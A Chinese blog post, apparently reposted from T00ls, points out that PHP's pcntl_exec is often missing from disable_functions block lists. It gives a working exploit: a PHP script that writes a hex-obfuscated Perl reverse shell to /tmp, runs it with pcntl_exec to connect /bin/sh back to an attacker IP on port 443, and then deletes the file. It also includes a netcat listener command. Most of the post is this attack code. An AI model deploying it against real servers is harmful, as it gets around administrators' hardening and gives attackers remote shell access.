PHP被遗漏的执行函数

  • A+
所属分类:代码审计

我见很多管理员在封杀PHP危险函数的时候一般都是这样的:disable_functions = proc_open,exec,passthru,shell_exec,system,popen
但是如果编译PHP时带--enable-pcntl参数就危险了,可以用pcntl_exec函数执行指定程序,也可以反弹一个SHELL,在PHPINFO里查看编译参数。
描述:pcntl_exec — 在当前进程空间执行指定程序
EXP:

/*******************************
 *查看phpinfo编译参数--enable-pcntl
 *作者 Spider
 *nc -vvlp 443
********************************/

$ip = 'xxx.xxx.xxx.xxx';
$port = '443';
$file = '/tmp/bc.pl';

header("content-Type: text/html; charset=gb2312");

if(function_exists('pcntl_exec')) {
    $data = "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx20x2dx77x0dx0ax23x0dx0a".
      "x0dx0ax75x73x65x20x73x74x72x69x63x74x3bx20x20x20x20x0dx0ax75x73x65x20".
      "x53x6fx63x6bx65x74x3bx0dx0ax75x73x65x20x49x4fx3ax3ax48x61x6ex64x6cx65".
      "x3bx0dx0ax0dx0ax6dx79x20x24x72x65x6dx6fx74x65x5fx69x70x20x3dx20x27".$ip.
      "x27x3bx0dx0ax6dx79x20x24x72x65x6dx6fx74x65x5fx70x6fx72x74x20x3dx20x27".$port.
      "x27x3bx0dx0ax0dx0ax6dx79x20x24x70x72x6fx74x6fx20x3dx20x67x65x74x70x72".
      "x6fx74x6fx62x79x6ex61x6dx65x28x22x74x63x70x22x29x3bx0dx0ax6dx79x20x24".
      "x70x61x63x6bx5fx61x64x64x72x20x3dx20x73x6fx63x6bx61x64x64x72x5fx69x6e".
      "x28x24x72x65x6dx6fx74x65x5fx70x6fx72x74x2cx20x69x6ex65x74x5fx61x74x6f".
      "x6ex28x24x72x65x6dx6fx74x65x5fx69x70x29x29x3bx0dx0ax6dx79x20x24x73x68".
      "x65x6cx6cx20x3dx20x27x2fx62x69x6ex2fx73x68x20x2dx69x27x3bx0dx0ax73x6f".
      "x63x6bx65x74x28x53x4fx43x4bx2cx20x41x46x5fx49x4ex45x54x2cx20x53x4fx43".
      "x4bx5fx53x54x52x45x41x4dx2cx20x24x70x72x6fx74x6fx29x3bx0dx0ax53x54x44".
      "x4fx55x54x2dx3ex61x75x74x6fx66x6cx75x73x68x28x31x29x3bx0dx0ax53x4fx43".
      "x4bx2dx3ex61x75x74x6fx66x6cx75x73x68x28x31x29x3bx0dx0ax63x6fx6ex6ex65".
      "x63x74x28x53x4fx43x4bx2cx24x70x61x63x6bx5fx61x64x64x72x29x20x6fx72x20".
      "x64x69x65x20x22x63x61x6ex20x6ex6fx74x20x63x6fx6ex6ex65x63x74x3ax24x21".
      "x22x3bx0dx0ax6fx70x65x6ex20x53x54x44x49x4ex2cx20x22x3cx26x53x4fx43x4b".
      "x22x3bx0dx0ax6fx70x65x6ex20x53x54x44x4fx55x54x2cx20x22x3ex26x53x4fx43".
      "x4bx22x3bx0dx0ax6fx70x65x6ex20x53x54x44x45x52x52x2cx20x22x3ex26x53x4f".
      "x43x4bx22x3bx0dx0ax73x79x73x74x65x6dx28x24x73x68x65x6cx6cx29x3bx0dx0a".
      "x63x6cx6fx73x65x20x53x4fx43x4bx3bx0dx0ax65x78x69x74x20x30x3bx0a";
    $fp = fopen($file,'w');
    $key = fputs($fp,$data);
    fclose($fp);
    if(!$key) exit('写入'.$file.'失败');
    chmod($file,0777);
    pcntl_exec($file);
    unlink($file);
} else {
    echo '不支持pcntl扩展';
}

本文始发于微信公众号(T00ls):PHP被遗漏的执行函数

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: